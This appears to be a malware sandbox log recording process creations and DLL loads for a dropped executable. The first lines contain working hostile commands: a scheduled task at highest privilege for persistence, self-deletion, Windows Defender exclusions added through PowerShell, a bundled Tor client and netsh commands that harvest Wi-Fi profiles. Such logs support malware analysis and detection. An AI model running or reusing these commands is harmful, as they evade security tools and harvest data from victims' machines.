Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: onecorecommonproxystub.dll
